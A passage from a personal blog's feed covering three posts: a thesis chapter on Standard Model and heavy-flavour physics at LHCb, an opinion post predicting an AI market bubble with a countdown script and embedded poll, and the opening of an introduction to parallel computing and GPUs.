<p>The impact parameter \(b\) represents the shortest, perpendicular distance between the trajectory of a projectile and the center of the potential field generated by the target particle, as shown in Fig. 6. In accelerator experiments, collisions can be classified based on the value of the impact parameter. Central collisions have \(b \approx 0\), while peripheral collisions have impact parameters comparable to the radii of the colliding nuclei.</p>

<p><img src="/assets/accelerator-heavy-flavor-physics/impact.png" alt="impact" /></p>

<p><strong>Figure 6:</strong> A projectile scattering off a target particle. The impact parameter \(b\) and the scattering angle \(\theta\) are shown. Figure from <a href="https://commons.wikimedia.org/wiki/File:Impctprmtr.png">[Ref]</a>.</p>

<h3 id="detector-acceptance">Detector Acceptance</h3>

<p>In particle collider experiments, the location of the collisions is predetermined. However, the direction of the produced particles due to the interactions is not predetermined, i.e., the products can fly in every possible direction. However, depending on the geometry of the experiment or its physics program, detecting all the products is not feasible or desirable. The region of the detector where the particles are in fact detectable is referred to as the <em>acceptance</em>. In some cases, detection depends also on the energy, or other characteristics of the particle, meaning that the acceptance is not only a function of the particle’s direction, but also of those extra characteristics.</p>

<h2 id="the-standard-model-of-particle-physics">The Standard Model of Particle Physics</h2>

<p>The SM is a relativistic quantum field theory classifying all known elementary particles and describing three out of the four fundamental forces: the electromagnetic, weak nuclear and strong nuclear interactions, excluding gravity. It was developed progressively during the latter half of the 20th century through the contributions of numerous scientists worldwide <a href="https://books.google.com.na/books?id=5cyNEAAAQBAJ&amp;source=gbs_book_other_versions_r&amp;cad=1">[Ref]</a>. Its current form was established in the mid-1970s following the experimental confirmation of quarks. Subsequent discoveries, including the top quark in 1995 <a href="https://link.aps.org/doi/10.1103/PhysRevLett.74.2626">[Ref]</a>, the tau neutrino in 2000 <a href="https://www.sciencedirect.com/science/article/pii/S0370269301003070">[Ref]</a>, and the Higgs boson in 2012 <a href="https://www.sciencedirect.com/science/article/pii/S037026931200857X">[Ref]</a>, have further reinforced the validity of the Standard Model.</p>

<p>Fig. 7 depicts the elementary particles of the SM and their interactions. They can be divided into twelve <em>fermions</em> with spin-\(1/2\), five spin-1 gauge <em>bosons</em> (\(\gamma, g^a, W^{\pm}, Z^0\)), carriers of the electromagnetic, weak and strong interactions, and the spin-0 (scalar) Higgs boson (\(H\)).</p>

<p>The fermions are further grouped into six <em>quarks</em> and six <em>leptons</em>. The main difference is that quarks interact with all three fundamental forces of the SM, while leptons only interact with the weak and electromagnetic interactions. Quarks appear in six different flavors. In increasing order of quark masses they are called: up (\(u\)), down (\(d\)), strange (\(s\)), charm (\(c\)), bottom or beauty (\(b\)) and top (\(t\)) quarks. The quarks are further grouped into three generations of increasing masses. Up-type quarks (\(u\), \(c\), \(t\)) have an electric charge \(q=+(2/3)e\) while down-type quarks (\(d\), \(s\), \(b\)) have \(q=-(1/3)e\), where \(e\) is the elementary charge.</p>

<p>Quarks possess a property known as color charge, which causes them to interact through the strong force. Due to color confinement, quarks are tightly bound together, forming color-neutral composite particles called <em>hadrons</em>. As a result, quarks cannot exist in isolation and must always combine with other quarks. Hadrons are classified into two types: <em>mesons</em>, which consist of a quark-antiquark pair, such as the pion (\(\pi\)), the kaon (\(K\)), the \(B\), \(D\) and \(J/\psi\) mesons, and <em>baryons</em>, which are made up of three quarks. The lightest baryons are the nucleons: the proton and the neutron.</p>

<p>Furthermore, the solutions of the Dirac equation <a href="https://royalsocietypublishing.org/doi/10.1098/rspa.1928.0023">[Ref]</a> predict that each of the twelve SM fermions has a corresponding counterpart, known as its antiparticle, which possesses the same mass but opposite charge.</p>

<p>Similarly, the leptons are also grouped into three generations. Each generation contains a charged lepton and its corresponding uncharged neutrino. The charged leptons are the electron (\(e^-\)), the muon (\(\mu^-\)) and the tau (\(\tau^-\)). Their uncharged partners are the electron, muon and tau neutrinos (\(\nu_e\), \(\nu_{\mu}\), \(\nu_{\tau}\)). Being chargeless, they are not sensitive to the electromagnetic interaction and moreover, they are considered massless in the SM. The observation of neutrino oscillations <a href="https://link.aps.org/doi/10.1103/PhysRevLett.81.1562">[Ref]</a> requires that neutrinos have small but non-zero masses and thus implies physics beyond the SM.</p>

<p><img src="/assets/accelerator-heavy-flavor-physics/sm.png" alt="sm" /></p>

<p><strong>Figure 7:</strong> The Standard Model of elementary particles including twelve fundamental fermions and five fundamental bosons. Brown loops indicate the interactions between the bosons (red) and the fermions (purple and green). Please note that the masses of some particles are periodically reviewed and updated by the scientific community. The values shown in this graphic are taken from <a href="https://link.aps.org/doi/10.1103/PhysRevD.110.030001">[Ref]</a>. Figure from <a href="https://commons.wikimedia.org/wiki/File:Standard_Model_of_Elementary_Particles.svg">[Ref]</a>.</p>

<p>The five types of gauge bosons mediate the interactions between the fermions. The electromagnetic is mediated by the photon \(\gamma\), the strong by eight distinct gluons \(g^a\), and the weak by the W\(^{\pm}\) and Z\(^0\) bosons. The Higgs boson plays a special role in the Standard Model by providing an explanation for why elementary particles, except for the photon and gluon, have mass. Specifically, the Higgs mechanism is responsible for the generation of the gauge boson masses while the fermion masses result from Yukawa-type interactions with the Higgs field.</p>

<p>Table 1 summarizes the masses \(m\) and electric charges \(q\) of the fermionic elementary particles of the SM, while in Table 2, the masses, charges and spins of the elementary bosons are shown.</p>

<table>
  <thead>
    <tr>
      <th>Generation</th>
      <th>Quark</th>
      <th>\(m\) (MeV/\(c^2\))</th>
      <th>\(q\) (\(e\))</th>
      <th>Lepton</th>
      <th>\(m\) (MeV/\(c^2\))</th>
      <th>\(q\) (\(e\))</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>1</td>
      <td>\(u\)</td>
      <td>\(2.16 \pm 0.07\)</td>
      <td>+2/3</td>
      <td>\(\nu_e\)</td>
      <td>\(&lt;2 \times 10^{-6}\)</td>
      <td>0</td>
    </tr>
    <tr>
      <td> </td>
      <td>\(d\)</td>
      <td>\(4.70 \pm 0.07\)</td>
      <td>-1/3</td>
      <td>\(e^-\)</td>
      <td>0.511</td>
      <td>-1</td>
    </tr>
    <tr>
      <td>2</td>
      <td>\(c\)</td>
      <td>\(1273.0 \pm 4.6\)</td>
      <td>+2/3</td>
      <td>\(\nu_{\mu}\)</td>
      <td>\(&lt;0.19\)</td>
      <td>0</td>
    </tr>
    <tr>
      <td> </td>
      <td>\(s\)</td>
      <td>\(93.5 \pm 0.8\)</td>
      <td>-1/3</td>
      <td>\(\mu^-\)</td>
      <td>105.66</td>
      <td>-1</td>
    </tr>
    <tr>
      <td>3</td>
      <td>\(t\)</td>
      <td>\(172\,570\pm 290\)</td>
      <td>+2/3</td>
      <td>\(\nu_{\tau}\)</td>
      <td>\(&lt;18.2\)</td>
      <td>0</td>
    </tr>
    <tr>
      <td> </td>
      <td>\(b\)</td>
      <td>\(4183 \pm 7\)</td>
      <td>-1/3</td>
      <td>\(\tau^-\)</td>
      <td>1777</td>
      <td>-1</td>
    </tr>
  </tbody>
</table>

<p><strong>Table 1:</strong> Summary of the masses and charges of the elementary fermions in the SM. Mass values taken from <a href="https://link.aps.org/doi/10.1103/PhysRevD.110.030001">[Ref]</a>. Uncertainties are not displayed for masses if they are smaller than the last digit of the value.</p>

<table>
  <thead>
    <tr>
      <th>Boson</th>
      <th>Type</th>
      <th>Spin</th>
      <th>\(m\) (GeV/\(c^{2}\))</th>
      <th>\(q\) (\(e\))</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Photon</td>
      <td>Gauge</td>
      <td>1</td>
      <td>0</td>
      <td>0</td>
    </tr>
    <tr>
      <td>Gluon</td>
      <td>Gauge</td>
      <td>1</td>
      <td>0</td>
      <td>0</td>
    </tr>
    <tr>
      <td>Z\(^0\)</td>
      <td>Gauge</td>
      <td>1</td>
      <td>\(91.1880 \pm 0.0020\)</td>
      <td>0</td>
    </tr>
    <tr>
      <td>W\(^{\pm}\)</td>
      <td>Gauge</td>
      <td>1</td>
      <td>\(80.3692 \pm 0.0133\)</td>
      <td>\(\pm 1\)</td>
    </tr>
    <tr>
      <td>Higgs</td>
      <td>Scalar</td>
      <td>0</td>
      <td>\(125.20 \pm 0.11\)</td>
      <td>0</td>
    </tr>
  </tbody>
</table>

<p><strong>Table 2:</strong> Summary of the masses, charges and spins of the elementary bosons of the SM. Mass values taken from <a href="https://link.aps.org/doi/10.1103/PhysRevD.110.030001">[Ref]</a>. The masses of the photon and the gluon are the theoretical values.</p>

<h2 id="open-questions">Open Questions</h2>

<p>Despite the successes of the Standard Model, it is not a complete theory of fundamental interactions and several questions in physics remain open <a href="https://books.google.gr/books/about/Particle_Physics.html?id=bgeHngEACAAJ&amp;redir_esc=y">[Ref]</a>. For example, even though the three out of the four fundamental forces have been combined into the same theory, gravity, described by the general theory of relativity, cannot be integrated into the SM. The problem remains elusive, and theories Beyond the Standard Model (BSM) are needed, such as string theory or quantum gravity. In addition, the question of why there is more matter in the universe than antimatter, remains an open question. This problem is known as the matter-antimatter asymmetry and is a core question in the LHCb physics program. Furthermore, this question is related to CP violation, the violation of the charge-conjugation parity symmetry in particle interactions. This is one of the reasons why CP violation is heavily studied at LHCb. Moreover, it does not account for the accelerating expansion of the universe, and how it is possibly described by dark energy. Finally, the origin of dark matter remains to be understood as well as the explanation for neutrino oscillations and their non-zero masses.</p>

<h2 id="heavy-flavor-physics">Heavy Flavor Physics</h2>

<p>Going into more detail, the gigantic datasets being collected by the various accelerator experiments—and specifically by the Large Hadron Collider beauty (LHCb) experiment—are crucial to shed light on many of the open questions in particle physics <a href="http://arxiv.org/abs/2503.24346">[Ref]</a>, and in particular in heavy flavor physics.</p>

<p>An important matrix in flavor physics is the so-called Cabibbo–Kobayashi–Maskawa (CKM) matrix <a href="https://link.aps.org/doi/10.1103/PhysRevLett.10.531">[Ref]</a>, and is of the form:</p>

<p>\[
V_{CKM} =
\]
\[
V_{ud}, V_{us} , V_{ub}
\]
\[
V_{cd} , V_{cs} , V_{cb}
\]
\[
V_{td} , V_{ts} , V_{tb} \,.
\]</p>

<p>It is a unitary matrix that dictates the quark mixing strengths of the flavor-changing weak interaction, and is crucial in understanding CP violation. The unitarity of the CKM matrix imposes constraints on its elements, which can be visualized geometrically through the construction of so-called unitarity triangles. Unitarity triangles have angles conventionally labeled as \(\alpha\), \(\beta\) and \(\gamma\). The angle \(\beta\) is conventionally measured from the mixing-induced CP violation in \(B^0 \to J/\psi K^0_S\) decays. The angle \(\alpha\) is determined using the \(B\to \pi \pi\), \(\pi \rho\) and \(\rho \rho\) decays, while \(\gamma\) is inferred from CP violation effects in \(B^+ \to D K^+\) <a href="http://arxiv.org/abs/2503.24346">[Ref]</a>. The angles above are related to the unitarity relation between the rows of the CKM matrix corresponding to the couplings of the \(b\) and \(d\) quarks to \(u\) quarks. The current uncertainties, measured by LHCb, are \(0.57^{\circ}\) <a href="https://cds.cern.ch/record/2871717">[Ref]</a> and \(2.8^{\circ}\) <a href="https://cds.cern.ch/record/2905625">[Ref]</a> for \(\beta\) and \(\gamma\), respectively. These sensitivities have been achieved using data samples of integrated luminosity 2–9 fb\(^{-1}\). These values are projected to be reduced to \(0.20^{\circ}\) and \(0.8^{\circ}\), respectively, with 50 fb\(^{-1}\) of data recorded by the early 2030s, and even to \(0.08^\circ\) and \(0.3^\circ\), respectively, with 300 fb\(^{-1}\) of data recorded by the early 2040s.</p>

<p>Improving our understanding of the CKM matrix through global fits requires more precise knowledge of the magnitudes of the \(\vert V_{ub} \rvert\) and \(\lvert V_{cb}\rvert \) CKM matrix elements. We can determine these magnitudes by studying semileptonic decays like \(b \to u l \nu\) and \(b \to cl \nu\), where \(l\) denotes a charged lepton. Semileptonic decays can also be utilized to test the SM predictions on universality between the charged current weak interactions with different lepton flavors. This can be done using observables such as \(R(D^{(* )})\), which are the branching fraction ratios</p>

<p>\[
    \frac{B \to D^{(* )} \tau \nu}{B \to D^{(* )} e \nu}
\]
or
\[
    \frac{B \to D^{(* )} \tau \nu}{B \to D^{(* )} \mu \nu} \,.
\]
The current values of these quantities suggest possible discrepancies with the SM. In order to further explore these discrepancies, the measured uncertainties on these values have to be reduced. Currently, the uncertainty on both \(|V_{ub}|\) <a href="https://www.nature.com/articles/nphys3415">[Ref]</a> and \(R(D^{(* )})\) <a href="https://cds.cern.ch/record/2857546">[Ref]</a> is at 6%, from LHCb measurements. These uncertainties are projected to be reduced down to 1% and 3%, for \(|V_{ub}|\) and \(R(D^{(* )})\), respectively, with the increased number of collisions expected until the early 2040s.</p>

<p>Moreover, even though all CP violation in the charm sector is suppressed in the SM, CP violation in \(D^0\)-meson decays has been observed through asymmetries in \(D^0 \to K^+ K^-\) and \(D^0 \to \pi^+ \pi^-\) decays, captured by the observable \(\Delta A_{CP} = A_{CP}\left(D^0 \to K^+ K^- \right) - A_{CP}\left(D^0 \to \pi^+ \pi^- \right)\). \(A_{CP}(D^0 \to f)\) denotes the asymmetry between the \(D^0 \to f\) and \(\bar{D}^0 \to f\) decay rates to a final state  \(f\). With a sample of 5.9 fb\(^{-1}\), LHCb quoted an uncertainty of \(29 \times 10^{-5}\) <a href="https://cds.cern.ch/record/2668357">[Ref]</a>. This uncertainty can be potentially reduced almost by a factor of 10, down to \(3.3 \times 10^{-5}\), given the expected integrated luminosities of 300 fb\(^{-1}\). Furthermore, the charm samples essential to these measurements are produced at very large signal rates. Without real-time processing at the full collision rate these samples would be impossible to collect.</p>

<p>Beyond CP violation, the study of lepton flavor violation offers another compelling avenue for discovering BSM physics. While lepton flavor violation occurs in neutrino oscillations, any related effect in charged leptons is unobservably small within the SM framework. Consequently, observing any non-zero effect would be an unambiguous sign of BSM physics. Similarly, stringent upper limits on branching fractions, like \(\mathcal{B}(\tau^+ \to \mu^+ \gamma)\) and \(\mathcal{B}(\tau^+ \to \mu^+ \mu^+ \mu^-)\), tightly constrain potential BSM extensions of the Standard Model. For example, with a data sample of 424 fb\(^{-1}\), the Belle II collaboration has constrained \(\mathcal{B}(\tau^+ \to \mu^+ \mu^+ \mu^-)\) down to \(&lt;1.8 \times 10^{-8}\) <a href="https://doi.org/10.1007/JHEP09(2024)062">[Ref]</a>. This uncertainty, using 50 ab\(^{-1}\) instead, is projected to be reduced down to \(&lt;0.02 \times 10^{-8}\) until the early 2040s.</p>

<p>Heavy flavor physics remains a vital part of the global particle physics program. While experiments including ATLAS, CMS, LHCb and Belle II offer complementary strengths, they will also compete for the best precision on certain observables. This competion will allow for crucial consistency checks and ultimately lead to even more precise world average combinations. Collectively, these experiments can significantly advance the experimental precisions of all the key observables in \(b\), \(c\) and \(\tau\) physics, with an expected improvement of typically one order of magnitude from what is available today. Nonetheless, this represents only a partial evaluation of the true physics reach, suggesting the impact will probably be even more significant. The precision currently at reach with these experiments, including their upgrades, provides an unprecedented capability to probe the flavor sector of the Standard Model.</p>

<h2 id="conclusion">Conclusion</h2>

<p>In this post, I started by introducing fundamental concepts in accelerator physics, necessary to understand the technical aspects related to the detector physics of this work. I also described the Standard Model of particle physics, the open questions in the field, and finally the research outlook and expected impact of heavy flavor physics research.</p>

<p>This article is one of the chapters of my PhD thesis titled: <strong>“Real-Time Analysis of Unstructured Data with Machine Learning on Heterogeneous Architectures”</strong>. The full text can be found here: <a href="/news/phd-thesis/">PhD Thesis</a>. In the main results part of this work, GNNs were used to perform the task of track reconstruction, in the context of the Large Hadron Collider (LHC) at CERN.</p>]]></content><author><name> </name></author><category term="Blog" /><category term="Accelerator Physics" /><category term="Particle Physics" /><category term="LHCb" /><category term="CERN" /><summary type="html"><![CDATA[Explore the fundamentals of accelerator physics and heavy flavor particle physics, including the Standard Model, CKM matrix, CP violation, from the perspective of the LHCb experiment at CERN.]]></summary></entry><entry><title type="html">AI Bubble Burst: Countdown and Poll</title><link href="https://fotisgiasemis.com/blog/ai-bubble-burst-countdown/" rel="alternate" type="text/html" title="AI Bubble Burst: Countdown and Poll" /><published>2025-09-28T00:00:00+02:00</published><updated>2025-09-28T00:00:00+02:00</updated><id>https://fotisgiasemis.com/blog/ai-bubble-burst-countdown</id><content type="html" xml:base="https://fotisgiasemis.com/blog/ai-bubble-burst-countdown/"><![CDATA[<!-- ------------------- Countdown Section ------------------- -->
<div id="burst-date" style="font-size:1.3em; margin-top:1rem; text-align:center;"></div>

<div id="countdown-container" style="text-align:center; margin-top:1rem;">
  <div id="countdown" style="font-size:2.5em; font-weight:bold; color:#00bcd4;
              text-shadow: 0 0 10px rgba(0,188,212,0.8),
                           0 0 20px rgba(0,188,212,0.6),
                           0 0 30px rgba(0,188,212,0.4);">
  </div>
  <div style="margin-top:0.5rem; font-size:1.2em;">
    Counting down to the burst ... 🫧💥
  </div>
</div>

<script>
// ------------------- Countdown -------------------
var burstDateObj = new Date(2027, 1, 8, 0, 0, 0);
var burstDate = burstDateObj.getTime();

document.getElementById("burst-date").innerHTML =
  "📅 My prediction: <strong>" + burstDateObj.toDateString() + "</strong>";

var x = setInterval(function() {
  var now = new Date().getTime();
  var distance = burstDate - now;

  var days = Math.floor(distance / (1000 * 60 * 60 * 24));
  var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
  var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
  var seconds = Math.floor((distance % (1000 * 60)) / 1000);

  if (distance < 0) {
    clearInterval(x);
    document.getElementById("countdown").innerHTML = "💥 It burst!";
  } else {
    document.getElementById("countdown").innerHTML =
      days + "d : " + hours + "h : " + minutes + "m : " + seconds + "s";
  }
}, 1000);
</script>

<h2 id="is-there-really-an-ai-bubble">Is There Really an AI Bubble?</h2>

<p><img src="/assets/images/ai-bubble.png" alt="ai-bubble" />
<em>Image generated using OpenAI’s DALL·E, September 2025.</em></p>

<p>First of all, is there really an <strong>AI bubble</strong>? Saying that there is an AI bubble does not mean that the AI boom is completely unjustified. The benefits of generative AI and LLMs are undeniable at this point, but the amount at which this new technology is going to increase productivity in any sector is <strong>very likely overestimated</strong>. This makes the market overvalued and this is exactly what makes it a bubble. Even <strong>Sam Altman</strong>, one of the leaders behind this investment momentum and business deals responsible for this market sentiment, acknowledged the existence of a bubble in <a href="https://www.bloomberg.com/news/newsletters/2025-08-21/openai-s-altman-raises-stakes-for-ai-bubble-with-spending-push">late August</a>. For a more in depth look in the circular deals between OpenAI, Nvidia and Oracle that sound the alarms of an eminent bubble, you can see the article here: <a href="https://www.telegraph.co.uk/business/2025/09/24/100bn-deal-signals-ai-bubble-burst/">The $100bn deal sparking fears of a dotcom-style crash</a>.</p>

<h2 id="how-market-bubbles-form">How Market Bubbles Form</h2>

<p>So, how are bubbles formed exactly? Essentially, a <strong>technological advance</strong> is stimulating investment in a market, but usually the investment is overshot: the impact of the technology is overestimated in the beginning, resulting in much more investment needed for the integration and useful <strong>increase of productivity</strong>. When this is realised, the money is retracted and the bubble bursts. Later a plateau is reached that matches the actual added value of the technology. You can see this in the figure below.</p>

<p><img src="/assets/images/bubble_stages.png" alt="bubble_stages" />
<strong>Figure:</strong> The stages of a market bubble. <a href="https://transportgeography.org/contents/chapter3/transportation-and-economic-development/bubble-stages/">Source</a>: Dr. Jean-Paul Rodrigue, Hofstra University.</p>

<h2 id="which-ai-companies-might-survive">Which AI Companies Might Survive?</h2>

<p>How to easily spot companies that will not survive the AI bubble burst? Look at what their selling point is. If their main selling point is simply to use the “intelligence” of AI, then this is a warning sign. If you remove the AI selling part, does the company reduce to nothing? Then it is very likely that <strong>the company is not going to make it past the AI boom and bust</strong>.</p>

<h2 id="community-poll-your-prediction">Community Poll: Your Prediction</h2>

<p>Now it’s your turn: When do you think the AI bubble will burst? Cast your vote below.</p>

<!-- ------------------- StrawPoll Section ------------------- -->
<div id="poll-container" style="margin-top:3rem; text-align:center;">
  <!-- <h3>📊 When do you think the AI bubble will burst?</h3> -->

  <div class="strawpoll-embed" id="strawpoll_6QnMQo2KPne" style="height: 772px; max-width: 640px; width: 100%; margin: 0 auto; display: flex; flex-direction: column;">
    <iframe title="StrawPoll Embed" id="strawpoll_iframe_6QnMQo2KPne" src="https://strawpoll.com/embed/6QnMQo2KPne" style="position: static; visibility: visible; display: block; width: 100%; flex-grow: 1;" frameborder="0" allowfullscreen="" allowtransparency="">Loading...</iframe>
    <script async="" src="https://cdn.strawpoll.com/dist/widgets.js" charset="utf-8"></script>
  </div>
</div>

<style>
#bubble-container {
  position: fixed; /* floats over everything */
  bottom: 0;
  left: 0;
  width: 100%;
  height: 100%;
  pointer-events: none; /* doesn’t block clicks */
  overflow: hidden;
  z-index: 9999;
}

@keyframes bubbleFloat {
  0%   { transform: translateY(0) scale(1); opacity: 1; }
  50%  { opacity: 0.7; }
  100% { transform: translateY(-120vh) scale(1.5); opacity: 0; }
}

.bubble {
  position: absolute;
  bottom: 0;
  font-size: 1.5em;
  animation: bubbleFloat linear forwards;
}
</style>

<div id="bubble-container"></div>

<script>
function createBubble() {
  const bubble = document.createElement("div");
  bubble.className = "bubble";
  bubble.innerHTML = "🫧";
  bubble.style.left = Math.random() * window.innerWidth + "px";
  bubble.style.animationDuration = (4 + Math.random() * 6) + "s";
  document.getElementById("bubble-container").appendChild(bubble);

  setTimeout(() => bubble.remove(), 10000);
}

setInterval(createBubble, 1200);
</script>

<blockquote>
  <p><strong>Disclaimer:</strong> The views expressed in this post are solely my own, based on publicly available information. They do not represent the views of any current or past employer. This content is not financial advice.</p>
</blockquote>]]></content><author><name> </name></author><category term="Blog" /><category term="Financial Markets" /><category term="Machine Learning" /><category term="Artificial Intelligence" /><summary type="html"><![CDATA[Is the AI boom sustainable, or are we heading toward an AI bubble burst? Explore the signs, timeline prediction, and community poll.]]></summary></entry><entry><title type="html">From GPUs to FPGAs – An Introduction to High-Performance Computing</title><link href="https://fotisgiasemis.com/blog/hpc-gpu-fpga-intro/" rel="alternate" type="text/html" title="From GPUs to FPGAs – An Introduction to High-Performance Computing" /><published>2025-09-11T00:00:00+02:00</published><updated>2025-09-11T00:00:00+02:00</updated><id>https://fotisgiasemis.com/blog/hpc-gpu-fpga-intro</id><content type="html" xml:base="https://fotisgiasemis.com/blog/hpc-gpu-fpga-intro/"><![CDATA[<h2 id="introduction">Introduction</h2>

<p>In this post, we look into parallel, as opposed to sequential, computation, specialized hardware, in particular <strong>Graphics Processing Units (GPUs)</strong> and <strong>Field-Programmable Gate Arrays (FPGAs)</strong>, and High Performance Computing (HPC). This background is essential in the deployment of ML models in <strong>high-throughput</strong> or <strong>resource-constrained</strong> contexts.</p>

<h2 id="parallelism">Parallelism</h2>

<p>Traditionally, computer software has been sequential. A computer program was constructed as a series of instructions to be executed one after the other on the Central Processing Unit (CPU) of the computer. Parallel computing <a href="https://doi.org/10.1017/9781316795835.011">[Ref]</a>, on the other hand, uses multiple processing elements in order to tackle a problem simultaneously. Many tasks are essentially a repetition of the same calculation a large number of times. So, if these calculations are independent from each other, why wait for each one to finish before proceeding to the next one? The execution can be performed in parallel and thus the routine can be sped up. Historically, parallel computing was used for scientific problems and simulations, such as meteorology. This led to the design of parallel hardware architectures and the development of software needed to program these architectures, as well as HPC <a href="https://link.springer.com/book/10.1007/978-3-031-28924-8">[Ref]</a>.</p>

<h3 id="amdahls-law">Amdahl’s Law</h3>

<p>Ideally, doubling the number of processors would result in the halving of the runtime. However, in practice, very few algorithms achieve optimal speedup. The maximum potential speedup is given by Amdahl’s law <a href="https://doi.org/10.1145/1465482.1465560">[Ref]</a>. A task executed on a multicore system can be categorized into two parts: a part that does not benefit from the usage of multiple cores, and a part that does benefit. Assuming that the latter is a fraction \(\tau\) of the task, and that it benefits from an acceleration by a factor \(s\) compared to single core execution then, the maximum speedup is given by:</p>

<p>\[
    \text{Speedup}(s) = \frac{1}{1 - \tau + \frac{\tau}{s}} \,.
\]</p>

<p>The relationship is illustrated in Fig. 1. Interestingly, this law reveals that increasing the number of processors yields diminishing returns past a certain point. In addition, it demonstrates that the enhancements of the code have to be focused on both the parallelizable and non-parallelizable components. Of course, the simplistic view of computation needed for the derivation of Amdahl’s law neglects various aspects of inter-process communication, synchronization and memory access overheads. A more complete assessment is given by Gustafson’s law <a href="https://doi.org/10.1145/42411.42415">[Ref]</a>.</p>

<p><img src="/assets/hpc-gpu-fpga-intro/amdahl.png" alt="amdahl" /></p>

<p><strong>Figure 1:</strong> Demonstration of Amdahl’s law for the theoretical maximum  speedup of a computational system, as a function of the fraction of the parallelizable code \(\tau\), and the speedup factor \(s\) that the parallelization results in.</p>

<h3 id="the-cpu-as-a-parallel-processor">The CPU as a Parallel Processor</h3>

<p>During the 1980s until the early 2000s, various methods were developed for increasing the computational performance of the CPU. A crucial method was frequency scaling: By increasing the clock frequency of the CPU, more instructions can be executed in the same amount of time. Other methods included the use of reduced instruction sets, out-of-order execution, memory hierarchy or vector processing.</p>

<p>The Dennard scaling law was introduced in 1974 <a href="https://doi.org/10.1109/JSSC.1974.1050511">[Ref]</a> and it stated that as transistors get smaller the power consumption of a chip of constant size stays the same even if the number of transistors increases. As transistors became smaller and operating voltages decreased, circuits were able to run at higher frequencies without increasing power consumption. However, this scaling is considered to have broken down around 2006. Dennard scaling overlooked factors like the “leakage current” and the “threshold voltage”, which set a minimum power requirement per transistor. As transistors shrink, these parameters don’t scale proportionally, leading to an increase in power density. This created a so-called “power wall”, as shown in Fig. 2, that practically limited processor frequency to around 4 GHz <a href="https://wgropp.cs.illinois.edu/courses/cs598-s15/">[Ref]</a>, and which eventually led to Intel canceling the Tejas and Jayhawk microprocessors in 2004 <a href="https://www.nytimes.com/2004/05/08/business/intel-halts-development-of-2-new-microprocessors.html">[Ref]</a>.</p>

<p><img src="/assets/hpc-gpu-fpga-intro/power-wall.png" alt="power-wall" /></p>

<p><strong>Figure 2:</strong> Historical evolution of microprocessor clock rates from 1980 to 2012, illustrating the scaling plateau beginning in 2004. This effect demonstrates the breakdown of Dennard scaling and the so-called “power wall”, limiting further gains through increased frequency due to thermal and energy constraints. Figure from <a href="https://wgropp.cs.illinois.edu/courses/cs598-s15/">[Ref]</a>.</p>

<p>In order to address the problem of power consumption, manufacturers turned to producing power efficient processors that have multiple cores. Each core is independent and can access the same memory concurrently. This design principle brought multi-core processors to the mainstream. By early 2010s, computers by default had multiple cores, while servers had more than ten core processors. By contrast, in early 2020s, some processors had over one hundred cores <a href="https://link.springer.com/book/10.1007/978-3-031-28924-8">[Ref]</a>. Moore’s law <a href="https://doi.org/10.1109/JPROC.1998.658762">[Ref]</a>, that predicts that the number of transistors in an integrated circuit will double every roughly two years, can be extrapolated to the doubling of the number of cores per processor.</p>

<p>The operating system of the CPU ensures that the different tasks are performed concurrently using the resources of the processor by distributing them across the free cores. However, in order to unlock the full capacity of the processing unit, the code itself has to be designed in a way that leverages the new computational capabilities of multicore architectures <a href="https://link.springer.com/book/10.1007/978-3-031-28924-8">[Ref]</a>.</p>

<h3 id="flynns-taxonomy">Flynn’s Taxonomy</h3>

<p>One of the earliest classifications of parallel computers and programs is the so-called Flynn’s taxonomy <a href="https://doi.org/10.1109/PROC.1966.5273">[Ref]</a>. It categorizes programs based on whether they are operating using a single instruction or multiple instructions, and whether these instructions are executed on one or multiple data.</p>

<p>An entirely sequential program is equivalent to the Single Instruction Stream, Single Data Stream (SISD) classification. When the operation is repeated over multiple data, it corresponds to the Single Instruction Stream, Multiple Data Stream (SIMD) class, a form of data parallelism. On the other hand, when multiple instructions are performed on a single data, a form of dataflow parallelism, the program is classified as Multiple Instruction Stream, Single Data Stream (MISD). While systolic arrays are sometimes put in this category, the class is rather rare in practice. Multiple Instruction Stream, Multiple Data Stream (MIMD) is by far the most common type of modern programs, and is known as control parallelism. The taxonomy is summarized in Fig. 3.</p>

<p>In this context, data dependencies are a crucial aspect of implementing parallel code. If we have a sequence of steps, and each step depends on the result of the previous step then this sequence is not parallelizable since it must be executed in order. However, most algorithms contain opportunities where the execution can be parallelized. Notable examples of this are deep learning algorithms.</p>

<p><img src="/assets/hpc-gpu-fpga-intro/flynn.png" alt="flynn" /></p>

<p><strong>Figure 3:</strong> Flynn’s Taxonomy. (a) Single Instruction Stream, Single Data Stream (SISD), (b) Single Instruction Stream, Multiple Data Stream (SIMD), (c) Multiple Instruction Stream, Single Data Stream (MISD), (d) Multiple Instruction Stream, Multiple Data Stream (MIMD). The instruction and data pools are shown, as well as the Processing Units (PUs). Figures from <a href="https://commons.wikimedia.org/wiki/File:SISD.svg">[Ref]</a>, <a href="https://commons.wikimedia.org/wiki/File:SIMD.svg">[Ref]</a>, <a href="https://commons.wikimedia.org/wiki/File:MISD.svg">[Ref]</a> and <a href="https://commons.wikimedia.org/wiki/File:MIMD.svg">[Ref]</a>.</p>

<h2 id="from-video-games-to-the-gpu-architecture">From Video Games to the GPU Architecture</h2>

<p>Early arcade video games used specialized video hardware to handle graphics due to expensive memory units since the 1970s. The first integrated graphics processing unit, NEC’s μPD7220, was the most well known GPU until the mid-1980s. It supported graphics display monitors of \(1024 \times 1024\) resolution, and laid the foundations for the GPU market <a href="https://link.springer.com/book/9783540169109">[Ref]</a>.</p>

<p>Early 3D graphics emerged in the 1990s in arcades and consoles and GPUs started integrating 3D functions. The term GPU was coined by Sony in reference to their 32-bit Sony GPU used in the PlayStation 1 video game console, released in 1994 <a href="https://www.computer.org/publications/tech-news/chasing-pixels/is-it-time-to-rename-the-gpu/">[Ref]</a>. Nvidia and ATI started creating consumer graphics accelerators, leading to the release of GeForce 256. This GPU was marketed as the world’s first GPU capable of performing advanced graphics rendering. These capabilities included tasks such as rasterization, where an image described in a vector graphics format is translated into an array of pixels that best represents this vector description in the available screen granularity. Shading, another essential task for a graphics processor, is the process through which a GPU calculates the appropriate levels of light and color, in order to render a 3D scene more realistically. The first GPU capable of shading was the GeForce 3, used in the Xbox console, competing with the chip used in PlayStation 2.</p>

